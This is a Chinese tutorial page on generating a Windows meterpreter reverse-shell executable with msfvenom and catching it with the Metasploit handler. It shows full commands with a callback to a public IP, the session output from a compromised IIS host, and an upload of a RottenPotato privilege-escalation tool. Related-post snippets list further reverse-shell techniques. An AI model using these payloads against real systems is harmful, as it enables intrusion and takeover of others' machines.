2. 程式人生 > 實用技巧 >利用Metasploit反彈shell

利用Metasploit反彈shell

阿新 發佈:2020-10-09

msf製作windows-shell

1 .製作反彈shell-exe檔案

msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
//LHOST為公網IP
//LPORT為反彈埠
//4433.exe為生成檔案

2.控制端啟動msfconsole,獲取監聽

msfconsle
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run

3.反彈成功

meterpreter > sysinfo
Computer        : WIN-UKKED2CCSHJ
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows

meterpreter > getuid
Server username: IIS APPPOOL\padt002

4、上傳檔案

meterpreter > upload /root/RottenPotato/rottenpotato.exe
[*] uploading  : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
[*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
[*] uploaded   : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe

msf製作linux-shell

參考連結

csdn-利用Metasploit獲取linux反彈shell的嘗試
csdn-MSF生成windows木馬

宣告

嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 後果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合!

相關推薦

利用Metasploit反彈shell

msf製作windows-shell 1 .製作反彈shell-exe檔案 msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe

Dnscat2實現DNS隱蔽隧道反彈Shell

DNS介紹 DNS是域名系統(Domain Name System)的縮寫,是因特網的一項核心服務,它作為可以將域名和IP地址相互對映的一個分散式資料庫,能夠使人更方便的訪問網際網路,而不用去記住能夠被機器直接讀取的IP數串。

提權以及反彈shell一些方法

提權以及反彈shell netcat反彈shell kali中使用nc(netcat)進行監聽 用法 : nv -lvvp 2333(埠號)

反彈shell的各種姿勢

在滲透過程中,往往因為埠限制而無法直連目標機器,此時需要通過反彈shell來獲取一個互動式shell,以便繼續深入。

linux反彈shell總結

1.1傳送檔案(公網發內網) 檔案傳送端: nc -lp 6666 < 檔案 檔案接收端: nc 傳送端ip 傳送端埠 > 新檔案

[BJDCTF 2nd]duangShell 反彈shell

[BJDCTF 2nd]duangShell [BJDCTF 2nd]duangShell 點選進去之後提示我們swp原始碼洩露,訪問http://xxx/.index.php.swp下載該檔案

YXcms之利用phpMyAdmin拿shell

前些天大哥們在學校內網搭了這個YXcms靶場,記錄一下這次測試過程的一些方法感受,分享一下。 首先資訊收集一波,不管拿到什麼站點,第一件要做的事就是資訊收集,收集越多的資訊,那拿下這個站點的成功率也

反彈shell

反彈shell 參考安全客文章 簡介 我們在滲透測試的過程中經常會遇到linux主機環境,而在獲取linux主機shell是我們經常需要做的是工作內容之一,其中經常會遇到以下幾個場景。

反彈shell常用命令及分析

反彈shell常用命令及分析 1.利用nc反彈shell 一般情況下 服務端:nc 192.168.247.1 8888 -e /bin/sh

雲伺服器-Ubuntu更新系統版本-更新Linux核心-伺服器安全配置優化-防反彈shell

購入了一臺阿里雲的ESC伺服器,以前都用CentOS感覺Yum不怎麼方便,這次選的Ubuntu16.04.7

反彈shell升級成互動式shell

實驗環境: A :kali 虛擬機器 B:centos7.5 虛擬機器 1. A 機 kali 虛擬機器 設定監聽 埠

常見的幾種反彈shell(整理中)

目錄netcatsocatpowershellpowercat netcat # 當作telnet埠指紋探測 nc -nv x.x.x.x 110 # 檔案下載

3. redis未授權漏洞復現(寫入linux計劃任務反彈shell

前提:   1.靶機是Centos環境   2.redis低版本,具體低於多少不清楚 方式一:直接用進入redis寫入計劃任務(失敗,未成功反彈shell,失敗原因:未知,到靶機系統檢視檔案也成功寫入了,但是和下面使用指令碼寫

shell shift與{}_Linux下反彈shell的種種方式

技術標籤:shell shift與{} 0x01 Bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 這裡shell由bash解析,有時候是由sh解析,不一定百發百中***在虛擬機器裡面試過可行,替換成自己的地址和埠即可*

幾種Linux下反彈shell的方法

技術標籤:kali潶客技術 在滲透測試過程中我們需要把測試目標的shell反彈到我們的主機中,方便測試。比如在測試到命令注入時,可以反彈shell進行進一步測試。

Linux反彈shell(一)檔案描述符與重定向

參考網址: 1)更詳細網址:https://xz.aliyun.com/t/2548 版權宣告:本文為CSDN博主「liupeifeng3514」的原創文章,遵循 CC 4.0 BY-SA 版權協議,轉載請附上原文出處連結及本宣告。原文連結:https://blog.csdn.net

流量加密-Kali使用Openssl反彈shell

Kali使用Openssl反彈shell 前言 之前在護網的時候,如果流量中有明文的敏感資訊,譬如攻擊特徵,是很容易被IDS檢測出來的,此時紅隊的攻擊行為就會暴露。這是非常危險的一件事。今天我們通過本篇部落格來完成使用Ope

kali滲透測試日記 - 利用Metasploit掃描靶機mysql服務空密碼

利用Metasploit掃描靶機mysql服務空密碼 查詢模組 由於msf的模糊搜尋能力非常方便,可以嘗試如下搜尋:

bash反彈shell

part1:不求甚解的本地復現   攻擊端Debian 10.x: 192.168.208.134   受害端Ubuntu :192.168.208.135

CVE-2019-0708復現 靶機藍屏 無法反彈shell

轉自: https://www.haochen1204.com/index.php/archives/90/ CVE-2019-0708漏洞復現(shell與藍屏)